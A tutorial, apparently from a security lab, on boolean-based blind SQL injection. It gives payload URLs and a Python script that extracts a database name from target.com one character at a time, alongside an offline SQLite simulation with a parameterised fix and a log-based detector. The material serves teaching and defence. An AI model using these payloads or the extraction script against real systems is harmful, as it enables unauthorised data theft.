Boolean-based blind SQL injection is used when the application doesn't return query results or error messages, but does behave differently based on whether a condition is true or false. By asking the database a series of true/false questions, we can extract data one bit at a time.
Having covered error-based extraction, we now tackle the more challenging scenario where applications provide no direct feedback, requiring us to infer information from subtle behavioral differences.
In boolean blind injection, you inject conditions that evaluate to true or false and observe how the application responds. A true condition might return the expected page content, while a false condition returns an error or empty result.
```
# True condition - returns product details
http://target.com/product.php?id=1 AND 1=1--
# False condition - returns nothing or error
http://target.com/product.php?id=1 AND 1=2--
```

The core technique involves using string functions to test individual characters of the data you want to extract. By combining SUBSTRING() with ASCII comparisons, you can determine each character's value.
```
# Test if first character of version is '5'
http://target.com/product.php?id=1 AND substring(version(),1,1)='5'--
# Test if second character is '.'
http://target.com/product.php?id=1 AND substring(version(),2,1)='.'--
# Using ASCII for more precise testing
http://target.com/product.php?id=1 AND ascii(substring(version(),1,1))=53--
```

Instead of testing each possible character value, use binary search to minimize the number of requests needed. This reduces extraction time from O(n) to O(log n) per character.
```
# Is ASCII value > 64? (binary search)
http://target.com/product.php?id=1 AND ascii(substring(version(),1,1))>64--
# Is ASCII value > 96?
http://target.com/product.php?id=1 AND ascii(substring(version(),1,1))>96--
# Is ASCII value > 112?
http://target.com/product.php?id=1 AND ascii(substring(version(),1,1))>112--
# Narrow down to exact value
http://target.com/product.php?id=1 AND ascii(substring(version(),1,1))=118--
```

💡 Binary search reduces the average number of requests per character from 50 (linear) to 7 (log2 of 128 possible ASCII values).
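To see the oracle and the request-count difference without touching a live host, here is an added example (not the lab's own code) that rebuilds the vulnerable product lookup on an in-memory SQLite database, runs both the linear scan and the binary search from the text against it, and places the parameterised fix beside the defect. The table names, the secret value `lab7` and the `Product found` boolean are constructed; SQLite spells MySQL's `ascii(substring(...))` as `unicode(substr(...))`, and the `>` questions are exactly the ones shown above.

```python
import sqlite3

# Added example, not the lab's code: an in-memory SQLite stand-in for the
# vulnerable product lookup, so the boolean oracle and its request cost can be
# measured offline. SQLite spells MySQL's ascii(substring(...)) as
# unicode(substr(...)); everything else is the same idea.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE products (id INTEGER, name TEXT)")
conn.execute("INSERT INTO products VALUES (1, 'Widget')")
conn.execute("CREATE TABLE secrets (value TEXT)")
conn.execute("INSERT INTO secrets VALUES ('lab7')")   # constructed value to recover

SECRET_EXPR = "(SELECT value FROM secrets)"            # the expression being read
QUERY_COUNT = {"n": 0}                                 # queries the oracle answered


def vulnerable_lookup(user_id: str) -> bool:
    """The defect: user input concatenated into SQL. Returns the page's
    'Product found' test reduced to a boolean."""
    QUERY_COUNT["n"] += 1
    sql = "SELECT name FROM products WHERE id=" + user_id
    return conn.execute(sql).fetchone() is not None


def safe_lookup(user_id: str) -> bool:
    """The fix: the whole input is bound as one value and never parsed as SQL,
    so an injected condition can only fail to match an id."""
    QUERY_COUNT["n"] += 1
    row = conn.execute("SELECT name FROM products WHERE id=?", (user_id,)).fetchone()
    return row is not None


def char_linear(oracle, expr: str, position: int):
    """The lab's approach: try every printable ASCII code in turn (up to 95 queries)."""
    for code in range(32, 127):
        if oracle(f"1 AND unicode(substr({expr},{position},1))={code}"):
            return chr(code)
    return None            # nothing matched: past the end of the string


def char_binary(oracle, expr: str, position: int):
    """Binary search over 0..127: exactly 7 '>' questions per character."""
    lo, hi = 0, 127
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(f"1 AND unicode(substr({expr},{position},1))>{mid}"):
            lo = mid + 1
        else:
            hi = mid
    return chr(lo) if lo else None   # 0 means every '>' was false: end of string (NULL)


def extract(oracle, expr: str, method, max_len: int = 32):
    """Recover the string character by character; returns (text, queries used)."""
    QUERY_COUNT["n"] = 0
    text = ""
    for pos in range(1, max_len + 1):
        ch = method(oracle, expr, pos)
        if ch is None:
            break
        text += ch
    return text, QUERY_COUNT["n"]


if __name__ == "__main__":
    print(extract(vulnerable_lookup, SECRET_EXPR, char_linear))   # ('lab7', 329)
    print(extract(vulnerable_lookup, SECRET_EXPR, char_binary))   # ('lab7', 35)
    print(extract(safe_lookup, SECRET_EXPR, char_binary))         # ('', 7)
```

Four characters plus the end-of-string probe cost 329 queries linearly and 35 with binary search (7 per position, as the tip states). Against `safe_lookup` the same payload is bound as a single text value, never equals the integer id, and the search returns an empty string after its first 7 questions: the oracle is gone.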
Due to the repetitive nature of boolean blind injection, automation is essential. Tools like sqlmap can automate the entire process.
⚠️ Boolean blind injection requires many HTTP requests, making it slow and potentially detectable. Always use rate limiting and consider the stealth implications during assessments.
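The detectability mentioned above has a concrete shape in web server logs: one client sending many requests to one resource whose query strings carry SUBSTRING/ASCII conditions, with responses flipping between two sizes (the true and false pages). The following is an added example, not part of the lab, that parses a few constructed combined-format access-log lines and raises an alert on that pattern. The log format, the addresses, the threshold and the window are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not real traffic): one client issuing a burst
# of substring/ascii probes against product.php, and two ordinary-looking clients.
SAMPLE_LOG = """\
203.0.113.9 - - [10/Oct/2023:13:55:36 +0000] "GET /product.php?id=1+AND+ascii(substring(version(),1,1))>64-- HTTP/1.1" 200 5123
203.0.113.9 - - [10/Oct/2023:13:55:36 +0000] "GET /product.php?id=1+AND+ascii(substring(version(),1,1))>96-- HTTP/1.1" 200 5123
203.0.113.9 - - [10/Oct/2023:13:55:37 +0000] "GET /product.php?id=1+AND+ascii(substring(version(),1,1))>112-- HTTP/1.1" 200 412
203.0.113.9 - - [10/Oct/2023:13:55:37 +0000] "GET /product.php?id=1+AND+ascii(substring(version(),1,1))=118-- HTTP/1.1" 200 5123
198.51.100.4 - - [10/Oct/2023:13:55:38 +0000] "GET /product.php?id=2 HTTP/1.1" 200 5201
198.51.100.7 - - [10/Oct/2023:13:55:40 +0000] "GET /product.php?id=1%20AND%201=1-- HTTP/1.1" 200 5123
"""

# Combined log format: client, timestamp, request line, status, response size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+)'
)
# A boolean condition joined with AND/OR that either calls a character-extraction
# function or compares two numbers (the 1=1 / 1=2 sanity probes).
PROBE_RE = re.compile(
    r"\b(?:and|or)\b[^&]*\b(?:substring|substr|mid|ascii|ord)\s*\("
    r"|\b(?:and|or)\b\s+\d+\s*=\s*\d+",
    re.IGNORECASE,
)


def parse_line(line):
    """Return a dict for one log line (decoded query string split from the path), or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    resource, _, query = rec["path"].partition("?")
    rec["resource"] = resource
    rec["query"] = unquote_plus(query)   # decode %20 and '+' before matching
    rec["size"] = int(rec["size"])
    return rec


def is_probe(query: str) -> bool:
    """True when a decoded query string looks like an injected boolean condition."""
    return bool(PROBE_RE.search(query))


def find_blind_sqli(log_text, min_probes=3, window_seconds=60):
    """Alert on (ip, resource, probes_in_window, distinct_response_sizes) for any client
    that sends at least min_probes probe requests to one resource inside the window.
    Two distinct sizes from one client is the true/false oracle leaving its mark."""
    by_client = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and is_probe(rec["query"]):
            by_client[(rec["ip"], rec["resource"])].append(rec)

    alerts = []
    for (ip, resource), recs in by_client.items():
        recs.sort(key=lambda r: r["ts"])
        best, start = None, 0
        for end in range(len(recs)):          # sliding time window over this client's probes
            while (recs[end]["ts"] - recs[start]["ts"]).total_seconds() > window_seconds:
                start += 1
            count = end - start + 1
            if count >= min_probes and (best is None or count > best[0]):
                sizes = {r["size"] for r in recs[start:end + 1]}
                best = (count, len(sizes))
        if best:
            alerts.append((ip, resource, best[0], best[1]))
    return alerts


if __name__ == "__main__":
    for alert in find_blind_sqli(SAMPLE_LOG):
        print("possible boolean-blind SQLi:", alert)
```

On the sample, `203.0.113.9` trips the rule with four probes in one second and two response sizes (5123 and 412), while the single `1=1` request from `198.51.100.7` is recorded but stays below the threshold. Lowering `min_probes` or widening `window_seconds` trades false positives for sensitivity; the two-size signal is the part worth keeping in any real rule, since a rate-limited attacker still produces it.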
Let's extract the current database name using boolean blind injection.
```python
import requests


def check_char(position, char_value):
    """Return True when the character at `position` of database() has ASCII code `char_value`.

    The page text is the oracle: "Product found" appears only when the injected
    condition is true.
    """
    url = (
        f"http://target.com/product.php?id=1 "
        f"AND ascii(substring(database(),{position},1))={char_value}"
    )
    response = requests.get(url)
    return "Product found" in response.text


def extract_string(length):
    """Recover up to `length` characters, trying every printable ASCII code for each position."""
    result = ""
    for i in range(1, length + 1):
        for char in range(32, 127):
            if check_char(i, char):
                result += chr(char)
                break
    return result


if __name__ == "__main__":
    print(extract_string(20))
```